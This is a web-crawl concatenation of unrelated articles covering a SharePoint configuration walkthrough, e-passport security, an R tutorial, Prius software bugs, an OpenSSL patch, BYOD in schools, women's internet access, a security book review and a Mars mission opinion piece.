controller, am going to turn it on. Am going to create a host record. Start → Administrative Tools → DNS. Right click the right hand pane, select New Host (A or AAAA) In the New Host dialog box, in the Name (Use current domain name if blank, type intenseschool. In the IP Address section, type in the IP address of the SharePoint server machine, in this case 10.0.0.2. Uncheck the Create associated pointer (PTR) record. Click Add Host. A success DNS information dialog box appears with the message The host record intenseschool.testlab.com was successfully created. Now before I leave this place I am going to click Start àCommand Prompt to tell the system to do a group policy gpupdate, and am just going to force that (gpupdate /force) Group policy update has completed successfully is displayed in the Command Prompt window. I close this. Then we come to the SharePoint server, this is where we need to create the intenseschool alternate access name. I will click Add Internal URL. In the Add Internal URLs page, ensure the Alternate Access Mapping Collection web application is the correct one, in this case, SharePoint 80 web application. In the Add Internal URL section, at the URL, protocol, host and port textbox, type http://intenseschool. In the Zone dropdown section, select Extranet. I am using the extranet zone because that is the zone I have not used as yet. Click Save. So we have the intensechool on the extranet zone. What am going to do is am going to click on it. Just to be sure. As you can see it’s on the extranet zone. Am going to OK out of there. Then am going to click on Edit Public URL, just to be sure again, you can see, it is on the Extranet zone, it’s come in there. Click Save out of there. And now I don’t have to do anything here anymore. I’ll go to the client machine, and in here, am going to put it in here, but before I do that, I am just going to minimize this, and run the command line, and am going to tell this machine to gpupdate /force. Okay, that completed successfully. So am going to close this box. I am going to open the browser one more time. And I am just going to copy this URL, open a new page, am going to paste it in here, and I am going to edit the URL and change it from intranet or sps-sqldb (or whatever else you may have on yours) to intenseschool, and hit enter, and let’s see if that goes, and voila! So you see, our alternate access mapping is working just fine. So, thank you for watching this video Configuring Alternate Access Mappings, for SharePoint, see you again next time.
<urn:uuid:fab71e28-8be4-4433-8c38-1c9cd74061c3>
CC-MAIN-2017-09
http://resources.intenseschool.com/video-sharepoint-2013-alternate-access-mapping/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00408-ip-10-171-10-108.ec2.internal.warc.gz
en
0.915009
1,582
2.625
3
The global introduction of electronic passports is a large coordinated attempt to increase passport security. Issuing countries can use the technology to combat passport forgery and look-alike fraud. While addressing these security problems other security aspects, e.g. privacy, should not be overlooked. This article discusses the theoretical and practical issues, which impact security for both citizens and issuing countries. Existing legacy passports are paper based and use related security features. Despite of advanced optical security features paper based travel documents are sensitive to fraud. Two forms of fraud are most notable: - Passport forgery; a relatively complex approach where the fraudster uses a false passport, or makes modifications to a passport. - Look-alike fraud; a simple approach where the fraudster uses a (stolen) passport of somebody with visual resemblance. The ICAO (International Civil Aviation Organization) has been working on what they call MRTD (Machine Readable Travel Document) technology for quite a while. This technology should help to reduce fraud and support immigration processes. The MRTD specifications became a globally coordinated attempt to standardize advanced technology to deliver strong identification methods. Rather then using common practices from the security industry the MRTD standards aimed at a revolutionary combination of advanced technology, including contactless smartcards (RFID), public key cryptography, and biometrics. The MRTD specs support storage of a certificate proving authenticity of the document data. The signed data includes all regular passport data, including a bitmap of the holder’s picture. Further data that may be stored in the e-passport include both static and dynamic information: - Custody Information - Travel Record Detail(s) - Tax/Exit Requirements - Contact Details of Person(s) to Notify Since 2005 several countries have started issuance of e-passports. The first generation of e-passports includes some, but not all, of the planned security features. Biometric verification is generally not supported by the first generation. All 189 ICAO member states are committed to issue e-passports by 2010. From 2007 onward immigration services will start using e-passports. Authorities promote e-passports by issuing visa-waiver programs for travelers with e-passports. A passport that conforms to the MRTD standard can be recognized by the e-passport logo on the cover. Figure 1: The Electronic Passport logo. Electronic Passport security mechanisms With the aim to reduce passport fraud the MRTD specs primarily addressed methods to prove the authenticity of passport and its data, and the passport holder. The technology used for this includes PKI (Public Key Infrastructure), dynamic data signing and biometrics. The latter (biometrics) however is still under discussion and not yet fully crystallized in the specifications. PKI (Public Key Infrastructure) technology was chosen to prove the authenticity of the passport data. This technology is successfully applied on the internet for e-commerce, and has gained high popularity. Certificate based authentication requires only reading the certificate by the inspection system, which can then use a cryptographic computation to validate the authenticity using the public key of the issuing country. This method is called passive authentication and satisfies with RFID chips without public key cryptographic facilities, since it involves only static data reading. Although the authenticity of the data can be verified, passive authentication does not guarantee the authenticity of the passport itself: it could be a clone (electronically identical copy). The cloning problem is addressed with an optional signing mechanism called active authentication. This method requires the presence of a asymmetric key-pair and public key cryptographic capabilities in the chip. The public key, signed by the issuing country and verified by passive authentication, can be given to the inspection system, which allows verification of a dynamic challenge signed with the private key. While the private key is well protected by the chip it effectively prevents cloning since the inspection system can establish the authenticity of the passport chip with the active authentication mechanism. For the incorporation of modern electronic technology in the existing paper documents it was decided to use (contactless) RFID chips. These chips can be embedded in a page of the document and put no additional requirements on the physical appearance of the passport. A question that arises here is whether this is the only reason to apply RFIDs instead of contact based cards. Other reasons could be related to the form factor of contact smart cards which complicates embedding in a passport booklet, or the fact that contacts may be disturbance sensitive due to travel conditions. With the choice for RFID the privacy issue arises. RFIDs can be accessed from distances up to 30 cm, and the radio waves between a terminal and an RFID can be eavesdropped from a few meters distance. An adversary with dedicated radio equipment can retrieve personal data without the passport owner’s consent. This risk is particularly notable in a hostile world where terrorists want to select victims based upon their nationality, or criminals commit identity theft for a variety of reasons. Figure 2: Radio communication between inspection system and passport. Basic Access Control To protect passport holder privacy the optional Basic Access Control (BAC) mechanism was designed. This mechanism requires an inspection system to use symmetric encryption on the radio interface. The key for this encryption is static and derived from three primary properties of the passport data: 1) date of birth of holder; 2) expiry date of the passport; 3) the passport number. This data is printed in the Machine Readable Zone (MRZ) a bottom strip (see figure Figure 3) of one of the passport pages. In a normal access procedure the MRZ data is read first with an OCR scanner. The inspection system derives the access key from the MRZ data and can then set up an encrypted radio communication channel with the chip to read out all confidential data. Although this procedure can be automated it sets high requirements to inspection systems and also impacts inspection performance. Figure 3: Passport with Machine Readable Zone (MRZ). The BAC mechanism does provide some additional privacy protection, but there are two limitations that limit the strength of this mechanism: - The BAC key is individual but static, and is computed and used for each access. An adversary needs to get hold of this key only once and will from then on always be able to get access to a passport’s data. A passport holder may perceive this as a disadvantage considering the possibility that a passport contains dynamic data. - The BAC key is derived from data that may lack sufficient entropy: the date of expiry is always in a window of less than ten years, the date of birth can often be estimated and the document number may be related to the expiry date. The author of this article discovered BAC security issues in July 2005 and showed that the key entropy that could reach 66 bits may drop below 35 bits due to internal data dependencies. When passport numbers are for instance allocated sequentially they have a strong correlation with the expiry date, effectively reducing the key entropy. An eavesdropper would then be able to compute the BAC key in a few hours and decode all confidential data exchanged with an inspection system. The Netherlands, and maybe other countries, have changed their issuance procedures since this report to strengthen the BAC key. An associated privacy problem comes with the UID (Unique Identification) number emitted by an RFID immediately after startup. This number, if static, allows an easy way of tracking a passport holder. In the context of e-passports it is important that this number is dynamically randomized and that it cannot be used to identify or track the e-passport holder. The reader should note that these privacy issues originate from the decision to use RFID instead of contact card technology. Had this decision been otherwise the privacy debate would have been different as it would be the passport holder who implicitly decides who can read his passport by inserting it into a terminal. Inspection system security issues The use of electronic passports requires inspection systems to verify the passport and the passport holder. These inspection systems are primarily intended for immigration authorities at border control. Obviously the inspection systems need to support the security mechanisms implemented in an e-passport. This appears to be a major challenge due to the diversity of options that may be supported by individual passports. In terms of security protocols and information retrieval the following basic options are allowed: - Use of Basic Access Control (including OCR scanning of MRZ data) - Use of Active Authentication - Amount of personal data included - Number of certificates (additional PKI certificates in the validation chain) - Inclusion of dynamic data (for example visa) Future generations of the technology will also allow the following options: - Use of biometrics - Choice of biometrics (e.g. finger prints, facial scan, iris patterns, etc) - Biometric verification methods - Extended Access Control (enhanced privacy protection mechanism). In terms of cryptography a variety of algorithms and various key lengths are (or will be) involved: - Triple DES - RSA (PSS or PKCS1) - SHA-1, 224, 256, 384, 512 The problem with all these options is that a passport can select a set of preferred options, but an inspection system should support all of them! An associated problem in the introduction of the passport technology is that testing inspection systems becomes very cumbersome. To be sure that false passports are rejected the full range of options should be verified for invalid (combinations of) values. Finally, a secure implementation of the various cryptographic schemes is not trivial. Only recently a vulnerability was discovered by Daniel Bleichenbacher that appeared to impact several major PKCS-1 implementations. PKCS-1 also happens to be one of the allowed signing schemes for passive authentication in e-passports. This means that inspection systems should accept passports using this scheme. Passport forgery becomes a risk for inspection systems that have this vulnerability. Immigration authorities can defend themselves against this attack, and other hidden weaknesses, by proper evaluation of the inspection terminals to make sure that these weaknesses cannot be exploited. Biometrics and Extended Access Control The cornerstone of e-passport security is the scheduled use of biometric passport holder verification. The chip will contain the signed biometric data that could be verified by the inspection system. It is only this feature that would prohibit the look-alike fraud. All other measures do address passport forgery, but the primary concern of look-alike fraud requires a better verification that the person carrying the passport is indeed the person authenticated by the passport. Many countries have started issuance of e-passports, but the use of biometrics is delayed. There are two main reasons: - Biometric verification only works if the software performs a better job than the conventional verification by immigration officers. The debate on the effectiveness of biometric verification, and the suitability of various biometric features, is still ongoing. Also there are some secondary problems, like failure to enroll, that need to be resolved. - Biometric data are considered sensitive. The threat of identity theft exists, and revocation of biometric data is obviously not an option. Countries do not necessarily want to share the biometric data of their citizens with all other countries. The impact of first issue is decreasing in the sense that the quality of biometric systems gets better over time, although it may slow down the introduction of biometrics in e-passports. At least at this moment, there is still limited experience of representative pilot projects. The second issue is more fundamental, issuing countries will always consider who to share sensitive data with. To alleviate these concerns the ICAO standardization body has introduced the concept of Extended Access Control. Extended Access Control (EAC) The earlier described Basic Access Control (BAC) mechanism restricts data access to inspection systems that know the MRZ data. EAC goes further than that: it allows an e-passport to authenticate an inspection system. Only authenticated inspection systems get access to the sensitive (e.g. biometric) data. Inspection system authentication is based upon certificate validation, (indirectly) issued by the e-passport issuing country. An e-passport issuing country therefore decides which countries, or actually: which Inspection System issuers, are granted access to the sensitive data. EAC requires a rather heavy PKI. This is for two reasons: - Each Inspection System must be equipped with certificates for each country whose biometric details may be verified. - Certificates should have a short lifetime; otherwise a stolen Inspection System can be used to illegally read sensitive data. The current EAC specification foresees a certificate lifetime of several days. The two conditions above will result in an intensive traffic of certificate updates. A problem acknowledged by the EAC specification is the fact that e-passports have no concept of time. Since the RFID chips are not powered in between sessions, they do not have a reliable source of time. To solve this problem, an e-passport could remember the effective (starting) date of validated certificates, and consider this as the current date. This could potentially lead to denial-of-service problems: if an e-passport accepts an inspection system’s certificate whose effective date has not yet arrived, it may reject a subsequent inspection system certificate that is still valid. To avoid this problem the specification proposes to use only certificates of trusted domestic terminals for date synchronization. Although date synchronization based on domestic certificate effective dates would give the e-passport a rough indication of the current date this mechanism leaves a risk for some users. Infrequent users of e-passports and users being abroad for a long time will experience that their e-passport date is lagging behind significantly. For example, if an e-passport has validated a domestic EAC capable terminal 6 months ago, it will reveal sensitive data to any rogue terminal stolen over this period. The above problem could be alleviated by using a different date synchronization method. Instead of using effective dates of inspection system certificates we would use a separate source of time. For this ICAO, or another global Certification Authority, should issue date certificates on a daily basis, and inspection systems should load and update their date certificates frequently. A passport could then use the date certificates signed by a trusted party to get a reliable, and more accurate, source of time. This approach could be better since we can also synchronize on foreign systems and we could use the current date in stead of the inspection system certificate effective date. With respect to EAC and biometrics several practical and standardization issues are yet to be resolved. Although EAC, in its current specification, offers strong benefits over the simpler BAC it is certainly not a panacea, and there is room for improvement. Nevertheless, migration to biometrics in e-passports is needed to effectively combat look-alike fraud. The global introduction of electronic passports delivered a first generation of e-passports that support digital signatures for document authentication. The system builds on the newest technology, and a high level of expertise is needed for a secure implementation and configuration of both the e-passports and the inspection systems. The technology got increasingly complex with the decision to use contactless RFID technology. Additional security measures were introduced as a result of privacy concerns. But these measures appear to offer limited privacy protection at the cost of procedural and technological complexity. The next generation e-passports will include biometrics and Extended Access Control (EAC). The standardization of these features is unfinished and could still be improved. Future e-passports, using all security features, will offer strong fraud protection: - Passport forgery is more difficult with an e-passport that supports active authentication. - Look-alike fraud is more difficult with an e-passport that supports biometrics. This level of security can only be reached if all passports implement these features; otherwise fraudsters can fall back to less advanced or legacy passports. Therefore it is important for ICAO to finalize the EAC standardization, and for issuing countries to continue the migration process and enhance their passports with biometrics.
<urn:uuid:d841436d-828b-437a-9d12-3f0d284afb59>
CC-MAIN-2017-09
https://www.helpnetsecurity.com/2007/12/03/on-the-security-of-e-passports/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00584-ip-10-171-10-108.ec2.internal.warc.gz
en
0.922424
3,320
2.625
3
With great power comes not only great responsibility, but often great complexity -- and that sure can be the case with R. The open-source R Project for Statistical Computing offers immense capabilities to investigate, manipulate and analyze data. But because of its sometimes complicated syntax, beginners may find it challenging to improve their skills after learning some basics. If you're not even at the stage where you feel comfortable doing rudimentary tasks in R, we recommend you head right over to Computerworld's Beginner's Guide to R. But if you've got some basics down and want to take another step in your R skills development -- or just want to see how to do one of these four tasks in R -- please read on. I've created a sample data set with three years of revenue and profit data from Apple, Google and Microsoft. (The source of the data was the companies themselves; fy means fiscal year.) If you'd like to follow along, you can type (or cut and paste) this into your R terminal window: fy <- c(2010,2011,2012,2010,2011,2012,2010,2011,2012) company <- c("Apple","Apple","Apple","Google","Google","Google","Microsoft","Microsoft","Microsoft") revenue <- c(65225,108249,156508,29321,37905,50175,62484,69943,73723) profit <- c(14013,25922,41733,8505,9737,10737,18760,23150,16978) companiesData <- data.frame(fy, company, revenue, profit) The code above will create a data frame like the one below, stored in a variable named "companiesData": (R adds its own row numbers if you don't include row names.) If you run the str() function on the data frame to see its structure, you'll see that the year is being treated as a number and not as a year or factor: 'data.frame': 9 obs. of 4 variables: $ fy : num 2010 2011 2012 2010 2011 ... $ company: Factor w/ 3 levels "Apple","Google",..: 1 1 1 2 2 2 3 3 3 $ revenue: num 65225 108249 156508 29321 37905 ... $ profit : num 14013 25922 41733 8505 9737 ... I may want to group my data by year, but don't think I'm going to be doing specific time-based analysis, so I'll turn the fy column of numbers into a column that contains R categories (called factors) instead of dates with the following command: companiesData$fy <- as.factor(companiesData$fy) Now we're ready to get to work. One of the easiest tasks to perform in R is adding a new column to a data frame based on one or more other columns. You might want to add up several of your existing columns, find an average or otherwise calculate some "result" from existing data in each row. There are many ways to do this in R. Some will seem overly complicated for this easy task at hand, but for now you'll have to take my word for it that some more complex options can come in handy for advanced users with more robust needs. Simply create a variable name for the new column and pass in a calculation formula as its value if, for example, you want a new column that's the sum of two existing columns: dataFrame$newColumn <- dataFrame$oldColumn1 + dataFrame$oldColumn2 As you can probably guess, this creates a new column called "newColumn" with the sum of oldColumn1 + oldColumn2 in each row. For our sample data frame called data, we could add a column for profit margin by dividing profit by revenue and then multiplying by 100: companiesData$margin <- (companiesData$profit / companiesData$revenue) * 100 That gives us: Whoa -- that's a lot of decimal places in the new margin column. We can round that off to just one decimal place with the round() function; round() takes the format: round(number(s) to be rounded, how many decimal places you want) So, to round the margin column to one decimal place: companiesData$margin <- round(companiesData$margin, 1) And you'll get this result:
<urn:uuid:59d1a5ce-9ea8-4326-bd8e-8500347b4046>
CC-MAIN-2017-09
http://www.cio.com/article/2601363/developer/4-data-wrangling-tasks-in-r-for-advanced-beginners.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170613.8/warc/CC-MAIN-20170219104610-00280-ip-10-171-10-108.ec2.internal.warc.gz
en
0.774888
928
3.3125
3
Computer on WheelsBy Mel Duvall | Posted 2005-08-04 Email Print Strong sales of Toyota's Prius hybrid vehicles could be threatened by software malfunctions that leave drivers stuck in traffic. At its heart, the Prius is a computer on wheels. After slipping into the driver's seat, the owner simply pushes a button on the dash-much as you might press the On button on a computerand the vehicle powers up. This technology is often referred to as drive-by-wire, as there are no traditional cables, hydraulic lines or linkages connecting the gas pedal to the engine, the brake pedal to the brakes, or the stick shift to the transmission. If the car is in Park or Neutral and you press down on the gas pedal, the engine will not race as it would in a normal car, because the computer determines there is no purpose in doing so. A touch-sensitive console located in the center of the dashboard provides access to a number of features, such as radio settings and climate controls, as well as updates on the vehicle's performance. The screen shows, for example, a graphic representation of the power flow from the electric motor or gas engine in the hybrid system, and the average miles per gallon achieved over the last 5 minutes and 30 minutes. Virtually every major subsystem of the vehicle, from the electric motor to the gas engine and battery-pack system, has its own electronic control unita computerto control and direct operations. The major electronic control units in turn communicate with one another over a high-bandwidth network. And orchestrating the entire operation is the hybrid ECU. In action, it works like this: When initially pulling away, or driving at low speeds, the vehicle is powered by its electric motor. As the car picks up speed, the hybrid electronic control unit instructs the vehicle's gas engine to turn on and provide additional acceleration. The torque from the two motors is managed through a power splitting device called an electronic continuously variable transmission. At high speeds, the car runs primarily on the gas engine, which also recharges the vehicle's battery. The combined systems give the Prius outstanding fuel mileage60 miles per gallon in the city and 51 on the highway, as estimated by the Environmental Protection Agency. (Unlike conventional vehicles, the Prius gets better fuel mileage in the city because it can drive more often on the electric motor.) Its complexity, however, not only prevents most owners from tinkering under the hood, but has also been a concern for the automotive repair industry in general. "One look under the hood will scare you," says Craig Van Batenburg, owner of the Automotive Career Development Center in Worcester, Mass., which specializes in training independent garages on repairing vehicles. "They're more complicated, there are more computers, more sensors, and everything's packed in so tightly." And they can be dangerous. Power to the Prius' electric motor is supplied by a 276-volt battery pack. The average person can be killed by a 60-volt shot to the pants. Van Batenburg says safety measures are more critical than ever with the hybrids, but the independent repair industry has to learn how to handle hybrids or risk losing an increasing share of business to the dealerships. The average car owner probably isn't aware of how software updates even get into his vehicle. On most cars, a dongleor data portis installed just below the lower left side of the steering wheel. When the car is brought into the repair shop, a mechanic connects to the port and runs a set of diagnostic tests. The technology is a god-send for mechanics, according to Van Batenburg. "When the check-engine light comes on, it could be one of 600 things going wrong," he says. "Without the computer systems, it could take days to pinpoint a problem." Updating the software in the Prius, or any other vehicle, is a relatively simple process. Most shops now provide mechanics with wireless laptop computers. The mechanic uses the laptop to go to a secured Web site provided by the manufacturer, and downloads the latest software update to the laptop. From there, it gets passed through the data port to the flash memory in the vehicle. The Prius stalling problem may turn out to be minor. In fact, Van Batenburg speculates that a number of the incidents could simply be a result of owners trying to squeeze every bit of mileage they can out of a tank of gas and eventually hitting empty. (A number of Prius owners posting in online forums have insisted their tanks were not empty; Len says her car had plenty of gas left when it stalled.) However, it is also just as possible that the problem could be widespread and will result in a recall. In the meantime, it doesn't appear to be affecting the vehicle's sales. Toyota says it sold 9,622 Prius vehicles in the U.S. in June, at the height of attention over the software flaw, a 119% increase over the previous year. In the first six months of 2005, gas-priced-gouged consumers snapped up 53,310 of the $20,000 vehicles, compared to 21,890 in the first six months of 2004. Owners like Len say they're not bothered by the increasing amounts of software in their vehicles and, in fact, can't wait for more innovations and software-driven features to be added to the Prius. But they want Toyota and all manufacturers to get it right. "The computer techs, engineers and designers need to step up to the plate and fine-tune their craft," Len says. "Frankly, I hope I live long enough to own a flying car with whatever new technology is available to run it." Software Bugs Threaten Toyota Hybrids
<urn:uuid:2586a889-acde-4b33-bb85-30effcea7b01>
CC-MAIN-2017-09
http://www.baselinemag.com/c/a/Projects-Processes/Software-Bugs-Threaten-Toyota-Hybrids/2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00632-ip-10-171-10-108.ec2.internal.warc.gz
en
0.957635
1,182
2.96875
3
The OpenSSL project has patched a problem in the cryptographic library but one that likely does not affect many popular applications. OpenSSL enables SSL (Secure Sockets Layer) or TLS (Transport Layer Security) encryption. Most websites use it, which is indicated in Web browsers with a padlock symbol. It's an open-source library that is widely used in applications for secure data transfers. After serious vulnerabilities were found in OpenSSL over the last couple of years, the application has been under much scrutiny by security researchers. The latest vulnerability affects versions 1.0.1 and 1.0.2. The updated versions are 1.0.2f and 1.0.1r. In some cases, OpenSSL reuses prime numbers when using the Diffie-Hellman protocol, which could allow an attacker to possibly crack the encryption. There are some mitigating factors. An attacker would have to complete multiple handshakes with the computer he or she is trying to compromise. However, the option that reuses prime numbers is not on by default, and most applications likely are not at risk if that option has not been changed, according to the advisory. OpenSSL underpins two of the most widely used Web servers, Apache and nginx. The code library is also used to protect email servers, chat servers, virtual private networks and other networking appliances. The discovery of an alarming flaw called Heartbleed in April 2014 prompted a wide examination of OpenSSL. An audit was launched with the aim of eliminating years-old but unknown flaws.
<urn:uuid:73c56a94-126e-40ff-ba76-18fad6ceec92>
CC-MAIN-2017-09
http://www.csoonline.com/article/3027548/security/openssl-patches-a-severe-but-not-widespread-problem.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00632-ip-10-171-10-108.ec2.internal.warc.gz
en
0.945029
318
3.234375
3
Cloud Whitepaper: Bring Your Own Mobile Devices To School HP BYOD in Education Students and faculty are free to use personal mobile devices to access school resources while IT maintains control. Who should read this paper? School administrators, IT directors, security managers, and network managers should read this white paper to learn how HP Networking solutions simplify security and network access control to help schools make the most of bring your own device (BYOD) initiatives. In today’s educational environments, more and more students, guests, and faculty are bringing in their own Wi-Fi devices into the school’s network. This presents a unique challenge to the IT administrator. This paper discusses the challenges and solutions IT administrators are facing and how HP is addressing the security and management of the multiple devices being introduced into the wireless/wired network. Many higher educational institutions and K-12 schools are enticed by the idea of allowing students and faculty to use their own tablet computers, notebooks, and smartphones to access school resources. However, they are concerned about the security risks—and the impact on IT operations. HP Education for today’s learners Networking is helping educational institutions realize the potential of BYOD initiatives by enabling schools to allow students and faculty to use their own mobile devices in a way that is secure and operationally efficient. HP Intelligent Management Center (IMC) provides a simple way to enforce network access control that is ideal for BYOD initiatives. Technology is an essential element to keeping today’s students engaged. Demand for the expanded use of technology in education to raise academic achievement comes from virtually all constituents, from the federal government, to state education departments, to local school boards, teachers, parents, and students themselves. Tablets, notebooks, and other mobile devices takes learning out from computer labs and libraries and puts it directly into student’s hands. Especially for students who have grown up with Internet, gaming consoles, and texting. Digital curricula allow teachers to create new levels of interactivity that are ideal for individual and team learning, developing science and math skills, and language immersion. Mobile devices open up a universe of possibilities for science labs, distance learning, and student presentations. Teachers have new ways to assess students’ individual progress and provide additional instruction to students before they fall significantly behind. Continue Reading
<urn:uuid:b2998cff-afe4-4954-91a2-61343e2b1ee8>
CC-MAIN-2017-09
https://cloudtweaks.com/2012/10/cloud-whitepaper-bring-your-own-mobile-devices-to-school/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171463.89/warc/CC-MAIN-20170219104611-00156-ip-10-171-10-108.ec2.internal.warc.gz
en
0.93579
473
2.6875
3
Women and girls lag behind men in Internet access in many parts of the world, causing them to miss out on the economic and social benefits of being online, according to a new report from Intel. Across the developing world, there are about 25 percent fewer women than men online, said the report, one of the first to attempt to measure worldwide Internet access by women. In some areas the gap is even greater, with a 43 percent gap in sub-Saharan Africa, a 34 percent gap in the Middle East and North Africa, and a 33 percent gap in South Asia, according to the report. While many groups have acknowledged an Internet gap between the genders, the goal of the Intel report was to "quantify what that gap is, because that data didn't exist before," said Shelly Esque, vice president of Intel's corporate affairs group and president of the Intel Foundation. Women miss many benefits if they're not online, she said. "We believe, and I think there's plenty of evidence to support, that the Internet is a gateway to so much opportunity, information around health, education, economic opportunities," she said. "This list goes on and on. If women are denied access to that information, then they're denied opportunity to thrive in their communities." Promoting better Internet access for women is a good way to help improve economies around the world, added Melanne Verveer, ambassador at large for global women's issues at the U.S. Department of State, which, along with the United Nations and World Pulse, supported the study. "The dramatic differential in access to the Internet results in fewer opportunities for women to reach their full potential and a loss of significant economic and social contributions to their families and communities," Verveer wrote in the report. The Intel study found that Internet access can boost women's income. About half of survey respondents use the Web to search for and apply for jobs, and 30 percent have used the Internet to earn additional income, Intel said. The study is based on analysis of global databases and interviews and surveys of 2,200 women and girls in Egypt, India, Mexico and Uganda. Intel recommended a new global effort to get more women and girls online, with governments and privacy industry working together to bridge the gender gap. The study predicted that an additional 450 million women and girls will come online in the next three years through organic growth, but a concerted effort could bring an additional 150 million online. Private industry can work to make Internet access affordable and provide more free content that appeals to women, the study said. Governments can develop national plans for increasing broadband penetration, it recommended. With 600 million more women online during the next three years, nearly a third of them would improve their ability to generate new income, and the new online users could create a market of US$50 billion to $70 billion in IT and telecom sales, Intel estimated. One barrier to bringing more women online is an attitude among some women, the study said. One in five women in India and Egypt believes the Internet is not appropriate for them, the study said. Some of those women don't believe the Internet has information they need, and others are concerned their families wouldn't approve of them being online, the study said. Part of the solution is educating women about what's available online and targeting information to groups who need it, Esque said. In some areas, women may be interested in maternal health information, and in other areas, weather and crop information, she said. "Until you know what's possible, it's hard to imagine how this can impact your life," she said. "It's incumbent on all the players, the private and the public sector, to think about, what is that local, relevant information?" Grant Gross covers technology and telecom policy in the U.S. government for The IDG News Service. Follow Grant on Twitter at GrantGross. Grant's e-mail address is [email protected].
<urn:uuid:b80b1bbb-6b1c-49f9-aaaa-80fd38e0bf49>
CC-MAIN-2017-09
http://www.networkworld.com/article/2162688/data-center/study--women-lagging-in-internet-adoption-in-many-countries.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173866.98/warc/CC-MAIN-20170219104613-00032-ip-10-171-10-108.ec2.internal.warc.gz
en
0.96234
812
2.640625
3
Authors: Rob Shimonski and Sean-Philip Oriyano Whether it’s security vulnerabilities in software used by millions of home users and employees, or the natural human tendency to trust what comes at us, but even the most complex and far-reaching attacks today start with the compromise of a single endpoint. Unfortunately, this trend will continue until we either all learn to avoid these threats, or software and hardware developers churn out completely secure solutions – which means never. But, let’s do what we can, shall we? Educating ourselves shouldn’t be a chore, but a welcome option. About the authors Sean-Philip Oriyano has spent his time in the field working with nearly all aspects of IT and management with special emphasis on Information Security concepts, techniques, and practices. Rob Shimonski is a best-selling author and editor with over 15 years experience developing, producing and distributing print media in the form of books, magazines and periodicals. Inside the book It is natural for attackers to choose to strike where defenses are poorest. Servers and networks have become well-defended, so attackers are going for the users and their computers and devices. Client-side attacks are many and varied, and this books addresses them all. Using Cross-Site Scripting (XSS) as an introductory example, the authors have thoroughly dissected the attack and get readers through it step by step. Without getting into too many details at first, they explained simply the environment in which it is deployed, how it’s planned, and the main types of vulnerabilities this and other client-side attacks depend on for success. Client-side attacks can be aimed at popular computer software such as browsers and mail clients, web applications, active content technologies, and mobile devices. Each of these attack types get a chapter, but browser attacks encompasses four. It is understandable, as they are the users’ main door to the Internet. After a brief explanation of the common functions and features of modern browsers, the authors addressed those of Internet Explorer, Firefox, Chrome, Safari and Opera, along with their known flaws and security issues, then followed up with advanced web browser defenses. Peppered with tips, warnings and screenshots, this last chapter is a great source of information on how to “lock down” each of the browsers and their various active content elements such as Java, Flash, ActiveX, and others introduced and explained beforehand. Email client attacks – spam, malware, malicious code, DoS, hoaxes and phishing – are detailed and accompanied with concrete and theoretical examples. The chapters dedicated to web application and mobile attacks are thorough, and the latter should be compulsory reading for everyone owning a “smart” mobile device – whether it is one of Apple’s iDevices, those running on Google’s Android OS, or RIM’s Blackberry. Finally, the authors address the necessity of security planning (security policies), and of considering security needs from the very start. The pros for securing apps and infrastructure with things like digital signatures, certificates and PKI are explained, as well as these solutions’ limitations, and the book finishes with methods for securing clients (AV, patching, etc.) I really enjoyed how the authors eased gently into the subject, each new chapter offering enough new information to make it interesting, but not too much to prevent readers from feeling overwhelmed. They explained things in a way that should be understandable to anyone using the software and apps daily and looking for ways to make their computer use safer. I would recommend this book to inquisitive home users, but have to say that security professionals – apart from those only beginning their work in the field – will not find much to hold their interest.
<urn:uuid:20952425-a88c-4b17-9bf1-037e9bdb1c82>
CC-MAIN-2017-09
https://www.helpnetsecurity.com/2013/03/20/client-side-attacks-and-defense/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170914.10/warc/CC-MAIN-20170219104610-00152-ip-10-171-10-108.ec2.internal.warc.gz
en
0.935652
779
2.546875
3
The people behind the Inspiration Mars Foundation -- which on Wednesday announced plans to send a manned spacecraft on a 510-day fly-by mission to Mars -- say this on their website: "We are steadfastly committed to the safety, health and overall well-being of our crew. We will only fly this mission if we are convinced that it is safe to do." Let's hope that's true, because launching humans on such a long and faraway mission into space before we're technologically capable and reasonably certain about the health effects of such a prolonged journey just isn't worth it, at least in my opinion. The foundation, headed by U.S. multimillionaire and first space tourist Dennis Tito, wants to send a two-person crew ( a man and a woman) to Mars in 2018, when a rare planetary alignment would allow for a relatively short round-trip of about 500 days. The craft wouldn't even go into Mars orbit, but instead would fly within 100 miles and then "sling-shot" its way back toward Earth. The problem is, even while the Inspiration Mars Foundation assures it won't go through with the mission if it is unconvinced it would be safe, Tito tells Space.com that the two-person crew essentially are going to be guinea pigs: SPACE.com: What is the scientific value of a manned mission to Mars, if the crew won't be landing on the planet? Tito: At first, I thought this is not a science mission. This is for inspiration; it's a test flight to show we can get there. You're going to learn a lot about the engineering problems.But then as I started learning more about the life sciences, apparently [the benefits] are huge. There hasn't been really any information on human behavior in this kind of environment. The impact of radiation, the isolation — the academics are all very excited. It'd be a huge scientific value in the life sciences. And let's not forget all the other things that happen to the human body in space. A Russian experiment in which participants lived in the equivalent of deep space for 17 months showed that long trips in space can have drastic effects on sleep patterns and fitness. Given that prolonged sitting can be fatal, this is something to think about. Then there's bone loss, heart atrophy, nausea and headaches -- all conditions of modern space travel. While we're at it, let's throw in the recent NASA-supported study reporting that space travel is harmful to the brain and could accelerate Alzheimer's disease. And the "impact of radiation," as Tito puts it, is described in Wikipedia: The potential acute and chronic health effects of space radiation, as with other ionizing radiation exposures, involve both direct damage to DNA and indirect effects due to generation of reactive oxygen species. ...By one NASA estimate, for each year that astronauts spend in deep space, about one-third of their DNA will be hit directly by heavy ions. Thus, loss of critical cells in highly complex and organized functional structures like the central nervous system (CNS) could result in compromised astronaut function, such as changes in sensory perception, proprioception, and behavior or longer term decrements in cognitive and behavioral functions. So you lift off from Earth as a fully functioning human astronaut and you return (if you return) as ... what? I've said it before, and I'll say it again: As eager as I am to see us explore the stars, rushing into it is only going to lead to unnecessary 